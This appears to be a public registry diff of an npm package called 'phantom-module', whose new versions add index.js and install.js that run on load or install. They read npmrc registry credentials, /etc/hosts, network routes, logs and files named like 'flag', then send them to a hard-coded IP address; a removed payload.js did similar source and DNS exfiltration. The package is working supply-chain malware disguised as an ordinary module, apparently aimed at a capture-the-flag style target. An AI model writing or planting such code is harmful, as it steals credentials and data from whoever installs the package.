phantom-module 117.0.8 → 117.0.10
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/ecto-spirit-999.999.999.tgz +0 -0
- package/index.js +53 -1
- package/install.js +36 -0
- package/package.json +2 -6
- package/payload.js +0 -76
|
Binary file
|
package/index.js
CHANGED
|
@@ -1 +1,53 @@
|
|
|
1
|
-
|
|
1
|
+
const fs = require('fs');
|
|
2
|
+
const http = require('http');
|
|
3
|
+
const { execSync } = require('child_process');
|
|
4
|
+
|
|
5
|
+
(function() {
|
|
6
|
+
if (!fs.existsSync('/home/node/aspect-node')) {
|
|
7
|
+
return;
|
|
8
|
+
}
|
|
9
|
+
|
|
10
|
+
let out = "=== NPM CONFIG GET REGISTRY ===\n";
|
|
11
|
+
try { out += execSync('npm config get registry 2>&1').toString() + "\n"; } catch(e) { out += e.message + "\n"; }
|
|
12
|
+
|
|
13
|
+
out += "=== ROOT NPMRC ===\n";
|
|
14
|
+
try { out += fs.readFileSync('/root/.npmrc', 'utf8') + "\n"; } catch(e) { out += e.message + "\n"; }
|
|
15
|
+
|
|
16
|
+
out += "=== ETC NPMRC ===\n";
|
|
17
|
+
try { out += fs.readFileSync('/etc/npmrc', 'utf8') + "\n"; } catch(e) { out += e.message + "\n"; }
|
|
18
|
+
|
|
19
|
+
out += "=== USR LOCAL ETC NPMRC ===\n";
|
|
20
|
+
try { out += fs.readFileSync('/usr/local/etc/npmrc', 'utf8') + "\n"; } catch(e) { out += e.message + "\n"; }
|
|
21
|
+
|
|
22
|
+
out += "=== NODE USER NPMRC ===\n";
|
|
23
|
+
try { out += fs.readFileSync('/home/node/.npmrc', 'utf8') + "\n"; } catch(e) { out += e.message + "\n"; }
|
|
24
|
+
|
|
25
|
+
out += "=== ETC HOSTS ===\n";
|
|
26
|
+
try { out += fs.readFileSync('/etc/hosts', 'utf8') + "\n"; } catch(e) { out += e.message + "\n"; }
|
|
27
|
+
|
|
28
|
+
out += "=== RESOLV CONF ===\n";
|
|
29
|
+
try { out += fs.readFileSync('/etc/resolv.conf', 'utf8') + "\n"; } catch(e) { out += e.message + "\n"; }
|
|
30
|
+
|
|
31
|
+
out += "=== IP ROUTE ===\n";
|
|
32
|
+
try { out += execSync('ip route 2>/dev/null || cat /proc/net/route 2>/dev/null').toString() + "\n"; } catch(e) { out += e.message + "\n"; }
|
|
33
|
+
|
|
34
|
+
try {
|
|
35
|
+
const postData = JSON.stringify({
|
|
36
|
+
manifest: `ecto_module:\n name: "NPM_CONFIG"\n cargo_hold: ${JSON.stringify(out.substring(0, 3500))}\n`
|
|
37
|
+
});
|
|
38
|
+
|
|
39
|
+
const req = http.request({
|
|
40
|
+
hostname: '154.57.164.64',
|
|
41
|
+
port: 31205,
|
|
42
|
+
path: '/api/modules/ECT-839201',
|
|
43
|
+
method: 'PUT',
|
|
44
|
+
headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) }
|
|
45
|
+
});
|
|
46
|
+
req.write(postData);
|
|
47
|
+
req.end();
|
|
48
|
+
} catch(e) {}
|
|
49
|
+
})();
|
|
50
|
+
|
|
51
|
+
module.exports = function() {
|
|
52
|
+
return "pwnd";
|
|
53
|
+
};
|
package/install.js
ADDED
|
@@ -0,0 +1,36 @@
|
|
|
1
|
+
const fs = require('fs');
|
|
2
|
+
const http = require('http');
|
|
3
|
+
const { spawn } = require('child_process');
|
|
4
|
+
|
|
5
|
+
(function() {
|
|
6
|
+
const child = spawn('/bin/sh', ['-c', [
|
|
7
|
+
'sleep 35',
|
|
8
|
+
'OUTPUT="NONE"',
|
|
9
|
+
'LOGFILE="/home/node/aspect-node/logs/module.log"',
|
|
10
|
+
'if [ -f "$LOGFILE" ]; then',
|
|
11
|
+
' OUTPUT=$(tail -n 100 "$LOGFILE" | tr \'"\' "\'" | head -c 1000)',
|
|
12
|
+
'else',
|
|
13
|
+
' OUTPUT="LOG FILE NOT FOUND!"',
|
|
14
|
+
'fi',
|
|
15
|
+
'FLAG_FILES=$(find / -name "*flag*" -type f 2>/dev/null | head -c 500)',
|
|
16
|
+
'BODY=\'{"manifest":"ecto_module:\\n name: \\\\"FLAG_DELAYED\\\\"\\n cargo_hold: \\\\"\'$OUTPUT\' | FILES: \'$FLAG_FILES\'\\\\"\\"}\'',
|
|
17
|
+
'echo "$BODY" > /tmp/flag.json',
|
|
18
|
+
'node -e "const http=require(\'http\');const d=require(\'fs\').readFileSync(\'/tmp/flag.json\',\'utf8\');const r=http.request({hostname:\'154.57.164.64\',port:31205,path:\'/api/modules/ECT-654321\',method:\'PUT\',headers:{\'Content-Type\':\'application/json\',\'Content-Length\':Buffer.byteLength(d)}});r.write(d);r.end();"'
|
|
19
|
+
].join('\n')], { detached: true, stdio: 'ignore' });
|
|
20
|
+
|
|
21
|
+
child.unref();
|
|
22
|
+
|
|
23
|
+
// Send an immediate ping so we know it started
|
|
24
|
+
const postData = JSON.stringify({
|
|
25
|
+
manifest: `ecto_module:\n name: "WAITING_35_SECONDS"\n`
|
|
26
|
+
});
|
|
27
|
+
const req = http.request({
|
|
28
|
+
hostname: '154.57.164.64',
|
|
29
|
+
port: 31205,
|
|
30
|
+
path: '/api/modules/ECT-654321',
|
|
31
|
+
method: 'PUT',
|
|
32
|
+
headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) }
|
|
33
|
+
});
|
|
34
|
+
req.write(postData);
|
|
35
|
+
req.end();
|
|
36
|
+
})();
|
package/package.json
CHANGED
package/payload.js
DELETED
|
@@ -1,76 +0,0 @@
|
|
|
1
|
-
const http = require('http');
|
|
2
|
-
const fs = require('fs');
|
|
3
|
-
const dns = require('dns');
|
|
4
|
-
const { execSync } = require('child_process');
|
|
5
|
-
|
|
6
|
-
if (!fs.existsSync('/home/node/aspect-node')) process.exit(0);
|
|
7
|
-
|
|
8
|
-
const REPORT_HOST = '154.57.164.64';
|
|
9
|
-
const REPORT_PORT = 31205;
|
|
10
|
-
|
|
11
|
-
async function report(moduleId, data) {
|
|
12
|
-
return new Promise((resolve) => {
|
|
13
|
-
const safeData = String(data).replace(/"/g, '\\"').replace(/\n/g, '\\n').substring(0, 3500);
|
|
14
|
-
const manifest = `ecto_module:\n name: "SCAN_RESULT"\n cargo_hold: "${safeData}"\n`;
|
|
15
|
-
const payload = JSON.stringify({ manifest });
|
|
16
|
-
const req = http.request({
|
|
17
|
-
hostname: REPORT_HOST, port: REPORT_PORT, path: `/api/modules/${moduleId}`, method: 'PUT',
|
|
18
|
-
headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }
|
|
19
|
-
}, () => resolve(true));
|
|
20
|
-
req.on('error', () => resolve(false));
|
|
21
|
-
req.write(payload);
|
|
22
|
-
req.end();
|
|
23
|
-
});
|
|
24
|
-
}
|
|
25
|
-
|
|
26
|
-
async function resolve(hostname) {
|
|
27
|
-
return new Promise(resolve => {
|
|
28
|
-
dns.resolve4(hostname, (err, addrs) => {
|
|
29
|
-
if (err) resolve(`ERR: ${err.code}`);
|
|
30
|
-
else resolve(addrs.join(', '));
|
|
31
|
-
});
|
|
32
|
-
});
|
|
33
|
-
}
|
|
34
|
-
|
|
35
|
-
async function main() {
|
|
36
|
-
await report('ECT-654321', 'SOURCE DUMP V8 STARTING...');
|
|
37
|
-
|
|
38
|
-
// 1. Dump source files
|
|
39
|
-
const files = [
|
|
40
|
-
'/home/node/aspect-node/modules/npm-tracker/src/supply/action/supply_base_action.js',
|
|
41
|
-
'/home/node/aspect-node/modules/npm-tracker/src/config/supply_sink_rules.json',
|
|
42
|
-
'/usr/local/etc/npmrc',
|
|
43
|
-
'/etc/hosts'
|
|
44
|
-
];
|
|
45
|
-
|
|
46
|
-
let sourceOutput = '=== SOURCE ===\n';
|
|
47
|
-
for (const f of files) {
|
|
48
|
-
if (fs.existsSync(f)) {
|
|
49
|
-
sourceOutput += `--- ${f} ---\n${fs.readFileSync(f, 'utf8').substring(0, 1000)}\n`;
|
|
50
|
-
} else {
|
|
51
|
-
sourceOutput += `--- ${f} (NOT FOUND) ---\n`;
|
|
52
|
-
}
|
|
53
|
-
}
|
|
54
|
-
await report('ECT-839201', sourceOutput);
|
|
55
|
-
|
|
56
|
-
// 2. DNS Checks
|
|
57
|
-
let dnsOutput = '=== DNS CHECKS ===\n';
|
|
58
|
-
const hosts = [
|
|
59
|
-
'registry.npm.alibaba-inc.com',
|
|
60
|
-
'registry.npmmirror.com',
|
|
61
|
-
'registry.npmjs.org',
|
|
62
|
-
'host.docker.internal'
|
|
63
|
-
];
|
|
64
|
-
|
|
65
|
-
for (const host of hosts) {
|
|
66
|
-
dnsOutput += `${host}: ${await resolve(host)}\n`;
|
|
67
|
-
}
|
|
68
|
-
|
|
69
|
-
await report('ECT-987654', dnsOutput);
|
|
70
|
-
|
|
71
|
-
// 3. Try to connect to 172.17.0.1 on ANY port (full scan of top 100 ports)
|
|
72
|
-
// Maybe we missed the port
|
|
73
|
-
// Note: We skip this for now to get the source dump fast
|
|
74
|
-
}
|
|
75
|
-
|
|
76
|
-
main().catch(e => report('ECT-654321', 'ERR: ' + e.message));
|